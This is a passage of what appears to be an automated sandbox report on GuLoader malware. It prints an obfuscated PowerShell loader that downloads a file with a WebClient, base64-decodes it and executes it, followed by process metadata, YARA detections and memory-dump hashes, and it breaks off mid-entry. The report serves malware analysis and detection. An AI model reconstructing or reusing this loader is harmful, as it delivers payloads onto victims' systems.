xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. 
dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j ');Fritidsklubberne ($Autostandardization);Fritidsklubberne (Blaaklokkers ' kyd$CarpSHo knUmidd L meSemir Deml L.neM num salnK,lli Undn DemgIofbe NonrSpidnFalseIdio.Wat,HDr keCensaS bdd .sse HolrEtagsS bd[ Vig$ Su FHel uBogsrSuabtRusshUdspyDivi]Kidd= elv$ onoMRefoe BlulBe jlkompeNo dmcestsur tt HemyEverk.ffikAttreLatctRip ');$Miljbeskyttelseskonventioners=Blaaklokkers ',nsh$ O.uSUnden ahad .kaeF itrEnrelDem ePrefmTheanUdsairebunCapigCreme butrhyp.n OveePseu.LsniDSta o PoiwFrihnGhoullokko BlnaLystdKalvF UnbiCh llSickeresp( Kul$IganOTa pp,onev Je.eDolmjSpilnnighi CounAug.gElmueW,amrCas,nDueleSple,Wham$FirraArchn Ka.s YodtUudstKonge .arl .ersMeste NonsByfepZaptl egraMoonn I gsSc m)Ind ';$ansttelsesplans=$Balarao;Fritidsklubberne (Blaaklokkers 'Liba$ KonGT isL NonoJiv BKompA autLVest: arkpHemooOpers WebtBro IPol,L StaLAraeaEmueTUnmoiHeguOGyp NPorg= ig(Split eceEKvlnsDommtPaus-Fi uP MelASusstGadeh Sug P rv$Or hALageN,orsSDvrgtOnduTSheeEWreal Ba,S .taeMoolS Sh,PPsykLSestA RumN cars .um)Ocea ');while (!$Postillation) {Fritidsklubberne (Blaaklokkers 'D ou$FladgUd tlEf eoS ivbstera.lupl ra:P eeMPilie enorEntri EyetI.dio ncirCen iViolosejluPicksTranlquinyBar =Spec$FusetGrafrTek uScoleAlas ') ;Fritidsklubberne $Miljbeskyttelseskonventioners;Fritidsklubberne (Blaaklokkers 'P lySNotiTNeimaallerNaadTUfo,-r stsVandlCamoE V deOranpCard Fo s4Palm ');Fritidsklubberne (Blaaklokkers 'Plan$Stn gUlvel aloBissBl.dyAStanLVerd: ruPDehyOUn esDyscTSebriYvinlUniml BilAHeteT esti IsoOBlinn ep=Tril(Esclt Made EutsU.ictOmel-Ank pWhacaNilaTSkr hFrak lip$Bud ATroln rizsr veTFibrTChasEfrillUners.urgEc rcsFeofPInd LSekoA MilNTekss tto)ser ') ;Fritidsklubberne (Blaaklokkers 'Flan$StraGRentlDadeo ubbsmeraLat LDown:N nvYCo udAfgiE FodrMirslcarbiPl ugInvos pantOpsaESulfsChro=Ae.o$SciegforfLSheaOted bB deA KonlBars:N,agbComeiH drLTovrgSkylG ParEUdkar D snAf keMedl+Fre,+Konk% Kry$TestS SigaUllilUframT alEEcclD isiCorrg.arbT cepnSub iFjumN EdigIsopELophRSu 
csAsbe.MammCM llOSelvuP ovnBet,TCoug ') ;$Opvejningerne=$Salmedigtningers[$Yderligstes];}$Katinantergraft12=327303;$Klandret=29217;Fritidsklubberne (Blaaklokkers 'Sega$ di.gMalel layO MilbOrdrA.agel ei:F,rtI,jrnlOpd LInteaRootQTeoru,ille SkraStreb ,uaL tete,aar ,oss=Unde StegSt aE antopsl-VrdiC BalOSignnCeraTMesoESon NMa et .pr lec$ ForAButtN Trosbry,t MaeTKrakeTalllUmbrssal Eondus MarpSondLS prA KonNSkabSSubc ');Fritidsklubberne (Blaaklokkers ' sty$Anteg MuclWai.oInd,bMiniaSorel Ske:InteBMaalointrmMammbCa sy Re,cgul iFun.lObjel uteaHjer Pudd= ind East[Pho SOpsayC assSkartqurteTri.mfoto.FedtC MoooServntr.mv Co eDgnpr DmrtSwe ]B si:Fo s:S,rrFChadrMello Clom me.BVrgeaInspsTempeInfr6Data4ShebSProltKaemr.atriNonpnEfteg,ose(Bi o$rekoIMorgl O,fl PreaSp,nq Vrduf,ane SnoaE.spbAalelTe te Sko) kul ');Fritidsklubberne (Blaaklokkers ' e p$Epa gDepelpre,oFashBRnneaEspuLAspe:AlcafSem.iEnorrUncle A vSSem.IBgebdPresE,uri Mini= tri H mi[TyrksSlriY DumSInchtclogeShipM mrt.InteTForkEvarsx LogTS ua.Acrie onnN ,omC AstO OveDIntei hetNBiblGNote]Subp:Paal:SknjACounSAerocMisoIRi eiMe a.TilsgbjereoxidTMistS ChoTFu drKerai PronAm hGShri( je$WiseBPlatoRejimmultB ,teyTegnc,arsiKetaLG,nilLyriAM ho)Arta ');Fritidsklubberne (Blaaklokkers 'Sl e$KhmeGtolvL HanOViadbF.rfa esslSvin: onfpSymby dillFl,coUjvnr b.rO orlUMuttsFern6Stur9 Rai= C u$.panfBoerIM,rbr soleTo.ds erI alad odgeMark.MyelS keU C,tbTrensA ylTMosrr SteImodfN etrgAnti(Form$,arikDde AtreeTAteliinfanC,una VejN BeiTUopse C srDislGDimeRBl taPeleF ndtWhit1Trek2Prea,Vagt$ProcKUndrl GotABuseNhumed couRDr jEMasttPrer)Horr ');Fritidsklubberne $Pylorous69;"
                                          Imagebase:0x8f0000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.2577384991.00000000088A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000002.2577528361.000000000A45F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:false

                                          Target ID:14
                                          Start time:09:20:12
                                          Start date:24/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff75da10000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1466602074.00007FFAACC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaacc70000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8b46afcb46dd885173eb9c018854f9999fc62796a5936c8a500343f72d8d76c7
                                            • Instruction ID: 542d38475e038f4cfe44cd319bfa7204671d4b734510bcb5cc8ae8929bf7aef2
                                            • Opcode Fuzzy Hash: 8b46afcb46dd885173eb9c018854f9999fc62796a5936c8a500343f72d8d76c7
                                            • Instruction Fuzzy Hash: CD210662E1EB968FF7A59B2C585517866E1EF93220B5880BED04DC71D3EE1CEC0982C5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1465516444.00007FFAACBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaacba0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e763678d0c0cc005f4955d5bda1ea4af4b64bbfaa19515ab1066a29674e7a24
                                            • Instruction ID: 8e3cc5da43dde515ea4c56f65dd5f37baea4ca591e361720913b71a92a9c0004
                                            • Opcode Fuzzy Hash: 0e763678d0c0cc005f4955d5bda1ea4af4b64bbfaa19515ab1066a29674e7a24
                                            • Instruction Fuzzy Hash: 7631203081966ECFFBB4DF24CC4ABF93294FF42715F404539D44E86092DA3AA949CB55
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1465516444.00007FFAACBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaacba0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                            • Instruction ID: 94565608c678c14942e5c711cf7fae7b80acd95db1924eb5937b4f056ccaebf3
                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                            • Instruction Fuzzy Hash: 9D01677111CB0D8FD744EF0CE455AA5B7E0FB99364F10056DE58AC3691DB36E881CB45
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1465516444.00007FFAACBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaacba0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: M_^$M_^$M_^$M_^$M_^$M_^$M_^$M_^
                                            • API String ID: 0-3427207369
                                            • Opcode ID: 6097edd4b630070f7fe6b244580d98a1849a0a523904e70b5a7c411cb5550729
                                            • Instruction ID: 3e530a281a724c4baa3820922ca258fcb66d57f1ff70aac8bf0d88e1bfbdf925
                                            • Opcode Fuzzy Hash: 6097edd4b630070f7fe6b244580d98a1849a0a523904e70b5a7c411cb5550729
                                            • Instruction Fuzzy Hash: ED7172D2D0E7E3CBF6664359C8591A12FD0EF23B55B5982F6C0CD46883EC1B980B82C5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1465516444.00007FFAACBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaacba0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: M_^$M_^$M_^$M_^$M_^
                                            • API String ID: 0-2396788759
                                            • Opcode ID: 860aa84ca0af47aae88c2acdb46276856eed5866b3bffce02ebb2a614a47f987
                                            • Instruction ID: 50b730c478ee35bdf86abc01ae453c1d3a70625641e1fd821ef0bd907269b0a6
                                            • Opcode Fuzzy Hash: 860aa84ca0af47aae88c2acdb46276856eed5866b3bffce02ebb2a614a47f987
                                            • Instruction Fuzzy Hash: 604183D2D0E7D3CBF6564359C8592A06FD0EF23B5474982F6C0CC8A893FC0B980A82D6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1465516444.00007FFAACBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffaacba0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: M_^$M_^$M_^$M_^
                                            • API String ID: 0-1397233021
                                            • Opcode ID: cba83f778703b46b7c13fb5f058aa86391c752d486aeec159fa57d4df43bd0bf
                                            • Instruction ID: 3508ab3c264f1a202b317158722b3d508e96a0a60add1730c1c948ff45cb2b9b
                                            • Opcode Fuzzy Hash: cba83f778703b46b7c13fb5f058aa86391c752d486aeec159fa57d4df43bd0bf
                                            • Instruction Fuzzy Hash: 3431B392C0E7D28BF75B47A498550A13FE09F13B55B1A80F6C4DC8B493ED1BA81E83D2
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2542596573.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_3050000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cce6a6235907796ca0109c78387f5238b78990f6f8b882fddecf50c48494a9aa
                                            • Instruction ID: 1d75d302a35165c59f6f57c0a87d3627bf29bae336cc8ff340a493445b4d8e1d
                                            • Opcode Fuzzy Hash: cce6a6235907796ca0109c78387f5238b78990f6f8b882fddecf50c48494a9aa
                                            • Instruction Fuzzy Hash: 24A1ADA690E3C25FD7078B3888657DABFB0AF17254F1A40D7D484CF1E3E6245856C7A2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$tPq$tPq$tPq$tPq$tPq$tPq$tPq$tPq$tPq$tPq$tPq$tPq$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                            • API String ID: 0-3915220096
                                            • Opcode ID: df1e3057d1e6d1489c48674d3e33d478dd87e9afdac2d56fc1fc2c29ead9c487
                                            • Instruction ID: bf2f6aaa533cba5b6a20d552e41d3c83db89cdcbf026ba7a8fabb24ee39848cc
                                            • Opcode Fuzzy Hash: df1e3057d1e6d1489c48674d3e33d478dd87e9afdac2d56fc1fc2c29ead9c487
                                            • Instruction Fuzzy Hash: E6D2D9B1B1020ADFFB349F69C8417EAB7A2EF85710F14846AE9099BB51CB31DD41CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                            • API String ID: 0-855738717
                                            • Opcode ID: ad652d0e30a82dbc1781ba5b9e7bf8f9bedc9688fc2df8da505cc74dbb419506
                                            • Instruction ID: 90ae72ba329bf90ac0290cec007c0fb69282b300cf4c999d8bda5f289340a2bd
                                            • Opcode Fuzzy Hash: ad652d0e30a82dbc1781ba5b9e7bf8f9bedc9688fc2df8da505cc74dbb419506
                                            • Instruction Fuzzy Hash: 5D32F6F1B003068FEB349E6988517EAF7E6AFC5210F14807AD64ACBA51DF31D945CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q$$q$$q$$q
                                            • API String ID: 0-1185439275
                                            • Opcode ID: 6bdd3ab3cdbed2e33c400a50fff4e74d710fd692e7b720e316fab978b3694548
                                            • Instruction ID: 53a681445c59e4af18476fafaf9dfdbc121d314867ac7e720c115b9dcac003bf
                                            • Opcode Fuzzy Hash: 6bdd3ab3cdbed2e33c400a50fff4e74d710fd692e7b720e316fab978b3694548
                                            • Instruction Fuzzy Hash: 7E123BB1605306CFFB358B65C8516EABBA1EF86210F1880AAD64DCF653DB31D812C752
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq
                                            • API String ID: 0-3075684691
                                            • Opcode ID: f6eda1078a8c9f5d45d73bce3d60e4b79202ff2d945c95b7e1c742ea9fc77136
                                            • Instruction ID: 01f9765d1bae01de6609cd8be1a2a2c9cf45ab649878e145ecebec94f222cf1b
                                            • Opcode Fuzzy Hash: f6eda1078a8c9f5d45d73bce3d60e4b79202ff2d945c95b7e1c742ea9fc77136
                                            • Instruction Fuzzy Hash: 379273B4E00315CFEB34DB68C850B9AB7F2AB85314F14C4AAD6099BB55CB31ED46CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$tPq$$q
                                            • API String ID: 0-3302581459
                                            • Opcode ID: 1a5d6536c4c0f227c6e22e2d44faad01c22a4f475ca30bdac8b38bd33df0b71d
                                            • Instruction ID: ea34d3d0d1cc1828fd6df13cfe48d1dde4d1b49e1b5ddffd9e5fd92833eb50ec
                                            • Opcode Fuzzy Hash: 1a5d6536c4c0f227c6e22e2d44faad01c22a4f475ca30bdac8b38bd33df0b71d
                                            • Instruction Fuzzy Hash: 3342B8B5A00305DFEB34DF68C840BEAB7B2AF85314F15846AE6095BB51CB35E846CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2542596573.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_3050000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8N>k$h]>k$h]>k$h]>k$$q$$q$I>k
                                            • API String ID: 0-1435964878
                                            • Opcode ID: f92039ab4676ae40696e982b901659275ca93e602dd93266b7060e0d9702fe88
                                            • Instruction ID: 571288cc9323e424fa2d209183c8802a45efbd9eaa307227bd4839b350f3dd24
                                            • Opcode Fuzzy Hash: f92039ab4676ae40696e982b901659275ca93e602dd93266b7060e0d9702fe88
                                            • Instruction Fuzzy Hash: 46225F34B012188FDB25EB24C854BAEB7B6EF89344F1440E9E90AAB351DF359D46CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                                            • API String ID: 0-1794337482
                                            • Opcode ID: a76bedc654a3dc49e26157fad09e459042629b304a8e42c9135ba42a82e2cb04
                                            • Instruction ID: afe29ca10b789356524d1cd64e98d02e10ea6d8d089d164333c4a627a26bd5db
                                            • Opcode Fuzzy Hash: a76bedc654a3dc49e26157fad09e459042629b304a8e42c9135ba42a82e2cb04
                                            • Instruction Fuzzy Hash: ABD181B0A002058FE724DFA8C454BDEB7B3AF89304F64C42AE9096F755CB75ED428B91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q
                                            • API String ID: 0-4210068417
                                            • Opcode ID: 42c64a7150a5fdb94d67426a63f9ef103f8b45963085f321aaa7ca7681156880
                                            • Instruction ID: 17814c8286d01b08f6704b20fc83bb08b460e2afcdf7f5f584add3f10e48cbdb
                                            • Opcode Fuzzy Hash: 42c64a7150a5fdb94d67426a63f9ef103f8b45963085f321aaa7ca7681156880
                                            • Instruction Fuzzy Hash: 36123AF1B043258FFB358A6888517EA7BA2DFC6210F14847BD609DBB51DB31D846C792
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q
                                            • API String ID: 0-3126650252
                                            • Opcode ID: 105ed88404f784b510d83f78a97e6013432f281820bf666a799d485e583bc7d8
                                            • Instruction ID: 719699a4c93337d5f262f5aa6d6fb0afbefaa79b60d4750456ac116c6f536fc3
                                            • Opcode Fuzzy Hash: 105ed88404f784b510d83f78a97e6013432f281820bf666a799d485e583bc7d8
                                            • Instruction Fuzzy Hash: 97B1B1B4A002049FEB24DF64C850BDEBBB2AF89304F14C45AEA096F755CB35E846CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $q$$q$$q
                                            • API String ID: 0-3067366958
                                            • Opcode ID: c0d233ec62dd2843e959e576641be78fef8d3706904af9c48d76e234e13d6bda
                                            • Instruction ID: 40299c6c80f585d0b04fe022b5caed3052d95dedde1c6f430133352a71ec7c16
                                            • Opcode Fuzzy Hash: c0d233ec62dd2843e959e576641be78fef8d3706904af9c48d76e234e13d6bda
                                            • Instruction Fuzzy Hash: 4E411CB2B002168BEB389A6989407EBF7E6EFC5614B14846ADA09E7741DF31D901C7A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q
                                            • API String ID: 0-1467158625
                                            • Opcode ID: e9f377d16ea8c5bf17558dc6fc906992593b1b19411e41388dc31ea99b7ac1b8
                                            • Instruction ID: 8b18ea2f31bdc481bdace36b7e380f0fdb1c5d863cea78f3f3557765b7d2bd5c
                                            • Opcode Fuzzy Hash: e9f377d16ea8c5bf17558dc6fc906992593b1b19411e41388dc31ea99b7ac1b8
                                            • Instruction Fuzzy Hash: EF923EB4B00215CFEB24DB68C840B9AB7F2AB85304F14C0A9D64D9B755DB72ED86CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q
                                            • API String ID: 0-1467158625
                                            • Opcode ID: 08b1eb00ff69f883475d7b101c1c4eb6ac9cac3e84b5020523ef61262d9ac813
                                            • Instruction ID: 306aa4972fdf3b17c771fa9e3f1ea3d4d0c7396b0b012f8e982096012b994ad4
                                            • Opcode Fuzzy Hash: 08b1eb00ff69f883475d7b101c1c4eb6ac9cac3e84b5020523ef61262d9ac813
                                            • Instruction Fuzzy Hash: 86F131B0A002159FE724DB64C950BAEB7F3ABC4304F14C4A9E6096F795CB75ED828F91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q
                                            • API String ID: 0-1467158625
                                            • Opcode ID: 488e7b1344a6bafd15e7a9c2bbf9ebb7bc93681207034ed4c536baff3466cb04
                                            • Instruction ID: 51f76ecefad1f7952bda74c2247a4eddef1fb43c83a2b726cd0216b9b195d072
                                            • Opcode Fuzzy Hash: 488e7b1344a6bafd15e7a9c2bbf9ebb7bc93681207034ed4c536baff3466cb04
                                            • Instruction Fuzzy Hash: BEC161B4A003069BEB24DF94C840BAEB7F2AF84714F159429E5096BB55CB31F846CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q
                                            • API String ID: 0-1467158625
                                            • Opcode ID: 7f1bd5ec88227cf2791d230319ac8e9e96adfaae1d7ab2bf692484fae76e56e7
                                            • Instruction ID: 3ce1fce0a651b688183d9c9b18f46c8f49c9d7e91be7c63a8b32231ac77fadc0
                                            • Opcode Fuzzy Hash: 7f1bd5ec88227cf2791d230319ac8e9e96adfaae1d7ab2bf692484fae76e56e7
                                            • Instruction Fuzzy Hash: B5316BF2700245CBFB309A7988603EEF7A69BC5214B54847FE74A8BB51DE25C802C761
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2542596573.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_3050000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: h]>k$I>k
                                            • API String ID: 0-3817456764
                                            • Opcode ID: fc6df2a96d830b42b128eb241dbc0ee170c9aeaf32d81e4c68a5e80cf28eb3fa
                                            • Instruction ID: 552541cbcce7d1fc8eaee6d62269d5c62f06d8f02cabb83bd4b99a8f877ae493
                                            • Opcode Fuzzy Hash: fc6df2a96d830b42b128eb241dbc0ee170c9aeaf32d81e4c68a5e80cf28eb3fa
                                            • Instruction Fuzzy Hash: 30312E34B011188FCB25DB64C854BEEB7B2AF89304F1444EAD909AB351DB359E85CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $q$$q
                                            • API String ID: 0-3126353813
                                            • Opcode ID: 75d62212069339f6a04077ca36ecb6f32486aa00309792ec70e6a3d483e776f3
                                            • Instruction ID: 584a9d2b9bce54716d28ff2839648108e1fa797ceb80c210e409cd2486e01969
                                            • Opcode Fuzzy Hash: 75d62212069339f6a04077ca36ecb6f32486aa00309792ec70e6a3d483e776f3
                                            • API ID:
                                            • String ID: 4'q$tPq$$q$$q$$q
                                            • API String ID: 0-838716513
                                            • Opcode ID: 7f1397908fcf20e15a1085e46d29f187072cbfff7eca7426cf96ddde55cfe1c8
                                            • Instruction ID: 7235e2e89f7497e64397076e6c19a165649cd7cfd15594ea70d3fe6a06233348
                                            • Opcode Fuzzy Hash: 7f1397908fcf20e15a1085e46d29f187072cbfff7eca7426cf96ddde55cfe1c8
                                            • Instruction Fuzzy Hash: 4B51C0F1720206EFEB38CE14C5407E5B7A6AF45711F58806AEA4D9BEA0C372D880CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_73b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$tPq$$q$$q$$q
                                            • API String ID: 0-838716513
                                            • Opcode ID: 91bc317dd8b101fac86dde77403c4137605b571f45dbead88e074fec559e2f4c
                                            • Instruction ID: 2da32ee9bf32604a12ea5ccebded7de0a39bfc9faaf03717020435a164dd045f
                                            • Opcode Fuzzy Hash: 91bc317dd8b101fac86dde77403c4137605b571f45dbead88e074fec559e2f4c
                                            • Instruction Fuzzy Hash: 9C51A1F1720206EBFB38CE44C5447E5B7A6AF45711F58806AEA4D9BEA0C772D980CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2569079522.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
